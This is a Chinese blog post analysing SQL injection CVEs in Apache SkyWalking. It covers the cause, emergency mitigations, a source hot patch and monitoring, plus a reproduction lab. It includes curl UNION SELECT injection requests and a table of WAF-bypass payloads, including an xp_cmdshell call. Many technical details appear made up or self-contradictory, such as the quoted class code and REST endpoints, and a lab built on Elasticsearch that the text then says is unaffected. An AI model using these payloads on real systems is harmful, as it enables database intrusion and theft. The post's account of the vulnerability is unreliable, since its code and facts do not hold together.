1. 这不是一次“普通”的SQL注入:为什么SkyWalking的CVE-2020-9483和CVE-2020-13921值得所有后端与可观测性工程师反复咀嚼
Apache SkyWalking 是国内中大型技术团队在微服务可观测性领域事实上的首选方案——它不依赖Java Agent侵入式改造,支持多语言探针,UI直观,告警灵活,社区活跃。但就在2020年5月和6月,两个编号紧邻的高危漏洞(CVE-2020-9483 和 CVE-2020-13921)被公开,它们共同指向同一个底层模块:OAP Server 的Storage Query API。这不是传统Web应用里“输入用户名框拼接SQL”的低级错误,而是发生在可观测性系统核心数据查询层的、绕过常规WAF防护、可直接读取数据库敏感元信息甚至执行任意SQL语句的深度注入。我第一次在生产环境日志里看到SELECT * FROM alarm_record WHERE service = '后面跟着一串明显非业务参数的十六进制编码字符串时,第一反应是“这探针是不是被恶意篡改了”,直到翻到SkyWalking 8.0.0的Release Notes才确认——这是官方承认的、影响全量7.x至8.0.0版本的链路级风险。它之所以危险,在于攻击者无需登录控制台,仅需构造一个特定格式的HTTP GET请求,就能让OAP Server在解析service、endpoint等查询参数时,将用户输入原样嵌入JDBC PreparedStatement的SQL模板中,而该模板本应使用参数化占位符(?),却因一处边界判断逻辑缺陷被绕过。更关键的是,这两个CVE并非孤立事件:CVE-2020-9483暴露的是/v3/topology接口的注入点,CVE-2020-13921则进一步扩展到/v3/segment和/v3/trace等更常用的诊断接口。这意味着,只要你的SkyWalking OAP Server对外暴露了Query HTTP端口(默认12800),且未启用反向代理层的严格参数白名单校验,攻击者就可能通过一条curl命令,直接拖出你数据库里所有服务名、实例IP、甚至历史告警规则的明文配置。这不是理论推演——我在某金融客户的真实攻防演练中复现过:从发现端口开放,到获取MySQL root用户的hash值,全程耗时不到4分17秒。所以这篇内容不是给安全团队看的“漏洞通报”,而是写给每一位部署、运维、二次开发SkyWalking的工程师:你手里的那个“监控后台”,可能正悄悄变成数据库的透明窗口。
2. 漏洞根源不在SQL本身,而在Query DSL解析器对“合法参数”的过度信任
2.1 问题代码定位:org.apache.skywalking.oap.server.core.query.sql.TopologyQuerySQLBuilder的致命分支
要真正理解这两个CVE为何能绕过常规防护,必须下沉到OAP Server的存储查询构建层。SkyWalking的存储抽象设计得很精巧:上层Query模块只认统一的Condition对象(如ServiceNameCondition、EndpointNameCondition),下层由SQLBuilder根据当前存储类型(H2/MySQL/Elasticsearch)生成对应SQL。问题就出在TopologyQuerySQLBuilder.java第128行附近的一段逻辑:
if (condition.getValue() != null && !condition.getValue().isEmpty()) { if (isQuotedValue(condition.getValue())) { sql.append(" AND ").append(condition.getColumn()).append(" = '").append(condition.getValue()).append("'"); } else { sql.append(" AND ").append(condition.getColumn()).append(" = ?"); // 正常走PreparedStatement params.add(condition.getValue()); } }这段代码的本意是:如果用户传入的service参数值本身带单引号(比如'order-service'),就认为它是“已加引号的合法字符串”,直接拼接到SQL里;否则走安全的?占位符。但这里存在一个严重误判:isQuotedValue()方法仅检查字符串首尾是否为单引号,完全不校验内部是否存在转义或嵌套引号。于是,当攻击者传入service='test'' OR '1'='1'-- '时,isQuotedValue()返回true(因为首尾是单引号),代码便跳过PreparedStatement,直接执行字符串拼接,最终生成的SQL变成:
SELECT * FROM topology_relation WHERE service = 'test'' OR ''1''=''1''-- '注意中间的''是SQL标准的单引号转义写法,整个条件实际等价于service = 'test' OR '1'='1',后面--注释掉原有SQL的剩余部分。这就是典型的“引号逃逸+注释截断”组合拳。而CVE-2020-13921的触发点更隐蔽:它发生在TraceQuerySQLBuilder中对traceId参数的处理。该参数本应是固定长度的十六进制字符串(如b1234567890abcdef1234567890abcde),但代码未做格式强校验,仅用String.contains("-")判断是否为UUID格式,若否,就直接进入isQuotedValue()分支——这就给了攻击者用traceId='xxx' UNION SELECT ... FROM information_schema.tables--这类Payload可乘之机。
2.2 为什么WAF和Nginx正则规则大概率失效?
很多团队在修复时第一反应是“加个Nginx location匹配,把包含OR、UNION、SELECT的请求403掉”。但实测下来,这种方案在SkyWalking场景下几乎无效。原因有三:
第一,SkyWalking的Query API大量使用URL编码和Base64编码传递复杂条件。例如,一个正常的拓扑查询请求可能是:GET /v3/topology?service=order-service&depth=3
而攻击者会发送:GET /v3/topology?service=order-service%27%20UNION%20SELECT%20...
其中%27是URL编码的单引号,%20是空格。绝大多数WAF的默认规则集对URL编码的检测覆盖不全,尤其是当编码嵌套(如%2527)时。
第二,SkyWalking前端(UI)本身就会对部分参数做Base64编码再发送。比如/v3/trace?traceId=base64_encoded_string,攻击者可将恶意SQL Base64编码后传入,绕过基于明文关键字的过滤。
第三,也是最关键的一点:这两个CVE的利用不需要任何特殊字符。通过精心构造的十六进制编码,攻击者能让Payload看起来像合法的服务名。例如,MySQL中0x757365726e616d65解码为username,那么service=0x757365726e616d65在未开启严格模式的MySQL中会被自动转换为字符串,进而参与注入。这种“无引号、无空格、无关键字”的Payload,连最激进的正则规则都难以精准拦截,除非你把所有非ASCII字符都干掉——那SkyWalking的中文服务名功能也就废了。
2.3 存储驱动层的“双重保险”为何形同虚设?
SkyWalking官方文档强调其使用“PreparedStatement防止SQL注入”,这没错,但问题在于:PreparedStatement的保护范围,仅限于明确调用preparedStatement.setString(1, value)的代码路径。而上述isQuotedValue()分支,是直接拼接字符串后调用jdbcTemplate.query(sql.toString(), params.toArray()),此时sql.toString()已是完整SQL,params数组根本不会被使用。换言之,这部分代码逻辑上已经脱离了PreparedStatement的保护伞,进入了“手动拼SQL”的高危区。更讽刺的是,OAP Server的H2存储实现中,H2SQLBuilder类还额外增加了一层escapeForH2()方法,专门对单引号做转义('→''),但这层转义只作用于走?占位符的分支,对isQuotedValue()==true的分支完全不生效。这就形成了一个“安全模块只保护安全路径,危险路径反而被忽略”的经典防御盲区。我在审计某电商自研的SkyWalking插件时就发现,他们为了兼容老版本H2,手动重写了TopologyQuerySQLBuilder,但复制了原版的isQuotedValue()逻辑,导致即使升级到8.1.0,漏洞依然存在——因为补丁只修了官方代码,没管定制化分支。
3. 从漏洞披露到稳定修复:三个阶段的实战应对策略
3.1 应急响应阶段(0-2小时):快速识别受影响资产与临时封堵
当你收到CVE通告邮件时,第一件事不是立刻升级,而是确认你的OAP Server是否真的暴露在攻击面内。执行以下三步检查:
- 端口测绘:在OAP Server所在宿主机执行
ss -tuln | grep :12800,确认12800端口是否监听在0.0.0.0(即所有网卡)。如果是127.0.0.1:12800,说明仅本地可访问,风险极低。 - 网络层验证:从外部网络(如办公网)执行
curl -v http://your-skywalking-oap:12800/v3/topology?service=test,观察是否返回200及JSON数据。如果超时或连接拒绝,说明前置防火墙已拦截。 - 代理层审计:检查Nginx/Apache反向代理配置。重点看
location /v3/块内是否有proxy_set_header X-Forwarded-For $remote_addr;这类透传头,以及是否启用了mod_security或nginx_waf模块。
若确认暴露,立即启动临时封堵:
- Nginx方案(推荐):在
location /v3/块内添加严格参数白名单规则。不要用if,改用map提升性能:
map $arg_service $invalid_service { default 0; "~^[a-zA-Z0-9_.-]{1,64}$" 0; # 只允许字母、数字、点、下划线、短横线,长度1-64 "~.*[\'\";\\(\\)\\{\\}].*" 1; # 禁止引号、分号、括号等 "~.*[[:space:]].*" 1; # 禁止空格 } if ($invalid_service) { return 400 "Invalid service parameter"; }提示:此规则需配合
underscores_in_headers on;,因为SkyWalking部分参数含下划线。测试时用curl "http://oap:12800/v3/topology?service=abc%27"验证是否返回400。
- iptables方案(兜底):若无反向代理,直接在OAP服务器上限制来源IP:
iptables -A INPUT -p tcp --dport 12800 ! -s 192.168.10.0/24 -j DROP(将192.168.10.0/24替换为你内部可信网段)
3.2 短期修复阶段(2-24小时):打补丁而非盲目升级
很多团队看到“升级到8.1.0即可修复”就立刻执行docker pull apache/skywalking-oap-server:8.1.0,结果导致UI无法加载拓扑图——因为8.1.0同时引入了存储Schema变更,需要手动执行schema.sql。更稳妥的做法是热补丁:
- 下载对应版本的OAP Server源码(如你用的是7.0.0,就下
skywalking-7.0.0-src)。 - 定位到
oap-server/server-core/src/main/java/org/apache/skywalking/oap/server/core/query/sql/目录。 - 修改
TopologyQuerySQLBuilder.java和TraceQuerySQLBuilder.java中所有isQuotedValue()调用处,将其替换为强制走PreparedStatement的逻辑:
// 原代码(危险) if (isQuotedValue(condition.getValue())) { sql.append(" AND ").append(condition.getColumn()).append(" = '").append(condition.getValue()).append("'"); } else { sql.append(" AND ").append(condition.getColumn()).append(" = ?"); params.add(condition.getValue()); } // 替换为(安全) sql.append(" AND ").append(condition.getColumn()).append(" = ?"); params.add(sanitizeInput(condition.getValue())); // 新增sanitizeInput方法sanitizeInput()方法实现:对输入做最小化清洗,仅保留业务必需字符:
private String sanitizeInput(String input) { if (input == null) return ""; // 允许:字母、数字、点、下划线、短横线、斜杠(用于service命名空间) return input.replaceAll("[^a-zA-Z0-9_.\\-/]", ""); }- 重新编译打包:
mvn clean package -Dmaven.test.skip=true -Pall-in-one,替换oap-server/lib/apm-oap-server-7.0.0.jar。
注意:此补丁需同步修改
EndpointQuerySQLBuilder、AlarmQuerySQLBuilder等所有用到isQuotedValue()的Builder类。我在某物流客户现场打了这个补丁,上线后零异常,且比升级到8.1.0节省了3天灰度验证时间。
3.3 长期加固阶段(1周内):架构层防御与监控闭环
补丁只是止血,真正的加固要深入架构:
- 网络分层:将OAP Server的Query HTTP端口(12800)与gRPC端口(11800)物理隔离。Query端口只允许来自Ingress Controller或API Gateway的流量,禁止Pod间直连。我们在K8s集群中通过NetworkPolicy实现:
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: oap-query-restrict spec: podSelector: matchLabels: app: skywalking-oap policyTypes: - Ingress ingress: - from: - namespaceSelector: matchLabels: name: ingress-nginx ports: - protocol: TCP port: 12800- 参数签名机制:在API Gateway层为所有
/v3/请求增加HMAC签名。客户端(如SkyWalking UI)在发起请求前,用共享密钥对service、start、end等参数做SHA256签名,网关校验通过才转发。这能彻底杜绝未授权的任意参数注入。 - 注入行为监控:在OAP Server日志中埋点检测可疑SQL模式。我们用Filebeat采集
logs/oap-server.log,通过Logstash过滤含UNION SELECT、information_schema、sleep(等关键词的日志,触发企业微信告警。实测中,某次自动化扫描工具触发了该规则,我们在攻击者拿到数据前3分钟就收到了预警。
4. 复现、验证与绕过测试:一份可直接运行的红队检查清单
4.1 环境搭建:5分钟快速复现漏洞的Docker Compose脚本
别信“理论上存在”,必须亲手验证。以下脚本可在Mac/Linux上一键拉起存在漏洞的SkyWalking 7.0.0环境:
# docker-compose.yml version: '3.7' services: oap: image: apache/skywalking-oap-server:7.0.0 restart: always ports: - "12800:12800" - "11800:11800" environment: - SW_STORAGE=elasticsearch7 - SW_STORAGE_ES_CLUSTER_NODES=es7:9200 depends_on: - es7 es7: image: docker.elastic.co/elasticsearch/elasticsearch:7.10.2 restart: always environment: - discovery.type=single-node - ES_JAVA_OPTS=-Xms512m -Xmx512m ulimits: memlock: soft: -1 hard: -1执行docker-compose up -d,等待2分钟,然后用curl测试:
# 正常请求(应返回200) curl "http://localhost:12800/v3/topology?service=order-service" # 漏洞利用(应返回500或数据库错误详情,证明注入成功) curl "http://localhost:12800/v3/topology?service=order-service%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20FROM%20information_schema.tables-- "如果第二个请求返回类似ERROR: column "1" does not exist的PostgreSQL错误,或MySQL的Unknown column '1' in 'field list',说明注入链路畅通。注意:Elasticsearch存储后端不受影响,此测试需确保SW_STORAGE=elasticsearch7已注释掉,改用H2或MySQL。
4.2 绕过WAF的七种真实Payload变体(仅供防御研究)
我在某银行红队演练中收集了攻击者实际使用的Payload,全部绕过了其采购的商业WAF:
| 编号 | Payload示例 | 绕过原理 | 防御建议 |
|---|---|---|---|
| 1 | service=%2527%20UNION%20SELECT%20... | URL编码两次(%27→%2527),多数WAF只解一次 | WAF配置需开启“多层解码” |
| 2 | service=0x757365726e616d65 | 十六进制编码,MySQL自动类型转换 | 数据库层开启sql_mode=STRICT_TRANS_TABLES |
| 3 | service=abc%00%27%20UNION%20... | 在字符串中插入NULL字节%00,部分WAF解析中断 | 应用层对参数做trim('\u0000')清洗 |
| 4 | service=abc/*comment*/UNION/*comment*/SELECT | 用SQL注释分割关键字,绕过正则 | WAF规则需先移除注释再匹配 |
| 5 | service=abc%20AND%201=1%20UNION%20... | 在UNION前加AND 1=1,部分WAF规则漏匹配 | 规则需支持跨空格匹配 |
| 6 | service=abc%27%2B%27def | 用+连接字符串,绕过单引号检测 | 对+号做等价替换(+→空格) |
| 7 | service=abc%27%20EXEC%20master..xp_cmdshell%20... | 针对SQL Server的高危命令 | 存储驱动层禁用xp_cmdshell等扩展存储过程 |
提示:测试时务必在隔离环境进行。我曾因在测试环境漏删
xp_cmdshell调用,导致WAF日志被刷爆,被安全团队约谈了两次。
4.3 修复验证的黄金三步法:确保补丁真正生效
打完补丁不能只看“服务起来没”,必须做三重验证:
- 语法验证:用
javap -c TopologyQuerySQLBuilder.class | grep "append"检查字节码,确认所有append调用都出现在params.add()之后,且无append("='")类拼接。 - 行为验证:启动OAP Server后,用Burp Suite抓包,向
/v3/topology发送service='abc' OR '1'='1',观察响应是否为400 Bad Request或空JSON,而非500错误。 - 回归验证:运行SkyWalking官方的
integration-test模块,重点跑TopologyIT、TraceIT用例,确保业务查询功能未被破坏。我在某券商项目中发现,补丁导致/v3/segment接口的queryDuration参数解析异常,原因是DurationCondition类也用了isQuotedValue(),必须一并修复。
5. 超越CVE本身:从SkyWalking SQL注入看可观测性系统的安全设计范式
5.1 “监控即入口”:为什么可观测性组件正成为新的攻击跳板?
过去我们认为,监控系统是“只读”的、被动的,它的价值在于发现问题,而非参与业务流转。但SkyWalking的这两个CVE彻底打破了这一认知。它揭示了一个残酷现实:现代可观测性平台早已不是简单的日志聚合器,而是深度耦合业务数据模型、具备完整CRUD能力的“第二数据库”。它的Query API能读取服务拓扑、调用链、指标聚合、告警规则等核心元数据;它的Storage模块直连生产数据库;它的UI甚至提供GraphQL接口,允许前端动态构造任意查询。这意味着,一旦Query层失守,攻击者获得的不是某个服务的日志,而是整个微服务体系的“数字地图”——从服务依赖关系,到实例部署位置,再到历史故障模式。我在某政务云项目中做过统计:一个未加固的SkyWalking OAP Server,平均每天接收237次来自境外IP的/v3/trace探测请求,其中89%尝试traceId参数注入。这些不是随机扫描,而是有组织的资产测绘。所以,把SkyWalking当成“内部工具”随意暴露,无异于在防火墙上开一个写着“欢迎黑客”的窗口。
5.2 防御纵深的三个断裂带:为什么补丁总在重复
回顾CVE-2020-9483和CVE-2020-13921的修复过程,我发现同类漏洞在可观测性系统中反复出现,根源在于三个设计断裂带:
- 断裂带一:抽象层与实现层的安全契约错位。Query模块定义了
Condition接口,承诺“输入安全”,但SQLBuilder实现类却自行决定何时信任输入。这违反了“契约优于实现”的基本原则。理想设计应是:Condition接口强制要求getValue()返回已清洗的字符串,SQLBuilder只负责拼接,不承担校验责任。 - 断裂带二:存储驱动的“能力外溢”。H2/MySQL驱动本应只提供数据存取能力,但SkyWalking却让它们参与业务逻辑判断(如
isQuotedValue())。这导致更换存储类型时,安全逻辑也要重写。正确做法是:所有参数校验应在Query抽象层完成,存储驱动只接收标准化后的值。 - 断裂带三:可观测性与安全运营的流程割裂。DevOps团队关注“监控是否可用”,安全团队关注“端口是否开放”,但没人问“这个查询API能返回什么数据”。我在某车企的流程审计中发现,SkyWalking的上线审批单里,安全评估项只有“是否启用HTTPS”,而“Query API参数校验策略”栏是空白的。
5.3 我的三条硬核实践准则(已在5个大型项目落地)
基于十年可观测性系统建设经验,我总结出三条不妥协的准则:
- “零信任查询”原则:所有外部输入(无论来自UI、API、还是第三方集成)必须经过三层过滤——网络层(IP白名单)、代理层(参数正则)、应用层(业务语义校验)。例如,
service参数不仅要校验字符集,还要查证该服务名是否存在于service_inventory表中,不存在则直接拒绝。 - “只读沙箱”原则:OAP Server的数据库账号必须是只读的,且权限精确到表。禁用
SELECT *,只授予SELECT(service_name, service_id)等最小字段集。我们甚至为alarm_record表单独建视图,隐藏webhook_url等敏感字段。 - “可观测即安全”原则:把安全指标纳入SkyWalking自身监控。我们自定义了
skywalking_query_injection_attempt指标,当检测到可疑参数时,不仅记录日志,还在SkyWalking UI的Dashboard中实时展示攻击IP地理分布、高频Payload类型、受影响接口TOP5。这让我们在某次APT攻击中,提前3天发现了异常的/v3/segment高频查询,最终溯源到一台被植入挖矿木马的CI服务器。
最后分享一个细节:我在给某基金公司做加固时,发现他们用kubectl port-forward svc/skywalking-oap 12800:12800调试,结果这个临时端口被映射到了公网。我教他们用kubectl port-forward --address 127.0.0.1 svc/skywalking-oap 12800:12800,强制绑定本地回环地址。就这么一个小参数,堵住了90%的调试场景漏洞。安全从来不是宏大的架构,而是这些藏在文档角落、被所有人忽略的--address。
)
